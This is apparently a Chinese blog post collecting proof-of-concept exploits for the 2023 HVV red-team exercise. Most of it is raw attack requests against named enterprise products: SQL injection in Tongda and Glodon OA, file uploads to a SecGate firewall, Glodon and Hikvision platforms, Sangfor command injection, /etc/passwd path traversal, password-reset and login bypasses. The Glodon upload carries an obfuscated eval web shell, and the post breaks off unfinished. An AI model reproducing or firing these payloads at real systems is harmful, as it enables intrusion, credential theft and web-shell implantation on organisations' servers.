image

先来说说安全行业信息吧。。。。

还是那句话“没有网络安全,就没有国家安全”

重拳出击!国家安全机关破获美国中央情报局间谍案

hvv行动还有有必要的

image.png

护网行动技战法

看来大家都喜欢这个战法

1691724419360

想得太累 还是让人工智能写吧

1691724419355.jpg

做正事吧

通达OA sql注入漏洞CVE-2023-4165 POC

GET/general/system/seal_manage/iweboffice/delete_seal.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20fr om%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1HTTP/1.1Host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2AcceptEncoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests:11GET /general/system/seal_manage/dianju/delete_log.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count()%20f

泛微 OA 代码执行 EXP

Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。

Weaver E-Office9.0

泛微 Weaver E-Office9 前台文件包含

网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传

POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type:multipart/form-data;boundary=—-WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”MAX_FILE_SIZE”

10000000
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition:form-data; name=”upfile”; filename=”vulntest.php”
Content-Type: text/plain

——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”submit_post”

obj_app_upfile
——WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=”hash

0b9d6b1ab7479ab69d9f71b05e0e9445
——WebKitFormBoundaryJpMyThWnAxbcBBQc–
木马路径:attachements/xxx.php

网神 SecSSL 3600安全接入网关系统 任意密码修改

POST /changepass.php?type=2

Cookie:admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={“this_name”:”test”,”subAuthId”:”1”}
old_pass=&password=Test123!@&repassword=Test123!@

深信服应用交付命令执行

POST /rep/login

Host:URL

clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

深信服报表任意读取

GET/report/download.php?pdf=../../../../../etc/passwd HTTP/1.1

Host: xx.xx.xx.xx:85

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

Accept: /

Connection: Keep-Alive

绿盟sas安全审计系统任意文件读取漏洞

/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd

绿盟SAS堡垒机Exec远程命令执行漏洞

/webconf/Exec/index?cmd=要执行的命令

广联达后台文件上传

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1

Host: 10.10.10.1:8888

X-Requested-With: Ext.basex

Accept:text/html,application/xhtml+xml, image/jxr, /

Accept-Language: zh-Hans-CN,zh-Hans;q=0.5

User-Agent:Mozilla/5.0(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryFfJZ4PlAZBixjELj

Accept: /

Origin: http://10.10.10.1

Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40

Cookie:

Connection: close

Content-Length: 421

——WebKitFormBoundaryFfJZ4PlAZBixjELj

Content-Disposition:form-data; filename=”1.aspx”;filename=”1.jpg”

Content-Type: application/text

<%@ Page Language=”Jscript” Debug=true%>

<%

var FRWT=’XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD’;

var GFMA=Request.Form(“qmq1”);

var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);

eval(GFMA, ONOQ);

%>

——WebKitFormBoundaryFfJZ4PlAZBixjELj–

广联达OA SQL注入

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1

Host: xxx.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

Accept:text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie:

Connection: close

Content-Type:application/x-www-form-urlencoded

Content-Length: 88

dasdas=&key=1’ UNION ALL SELECT top 1812 concat(F_CODE,’:’,F_PWD_MD5)from T_ORG_USER –

通达

CVE-2023-4166

本次范围:通达OA版本11.10之前

post请求包

金山办公

WPS 命令执行

wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120

WPS Office 2019 企业版 < 11.8.2.12085

在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)

漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系

代码块在底下。(需要原pdf加wechat)

海康威视

HIKVISION iSecure Center综合安防管理平台文件上传

POST请求包

POST /center/api/files;.js HTTP/1.1

Host: x.x.x.x

User-Agent: python-requests/2.31.0

Accept-Encoding: gzip, deflate

Accept: /

Connection: close

Content-Length: 258

Content-Type:multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

–e54e7e5834c8c50e92189959fe7227a4

Content-Disposition:form-data;name=”file”; filename=”../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt”

Content-Type: application/octet-stream

9YPQ3I3ZS

蓝凌OA

前台代码执行

POST/sys/ui/extend/varkind/custom.jsp HTTP/1.1

Host: www.ynjd.cn:801

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

Accept: /

Connection: Keep-Alive

Content-Length: 42

Content-Type:application/x-www-form-urlencoded

var={“body”:{“file”:”file:///etc/passwd”}}

安恒明御运维审计与风险控制系统堡垒机任意用户注册

POST/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1

Host: xxx

Cookie:LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848

Cache-Control: max-age=0

Sec-Ch-Ua:”NotA;Brand”;v=”99”,”Chromium”;v=”100”,”Google Chrome”;v=”100”

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: “Windows”

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

汉得SRM tomcat.jsp 登录绕过漏洞 POC

/tomcat.jsp?dataName=role_id&dataValue=1

/tomcat.jsp?dataName=user_id&dataValue=1

POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(se lect*from(select+sleep(3))a)=’

分别访问后 直接访问后台。

辰信景云终端安全管理系统 login SQL注入漏洞 POC

POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(select*from(select+sleep(3))a)=’

用友 移动管理系 统 uploadApk.do 任意文件上传漏洞

未完。。。。。。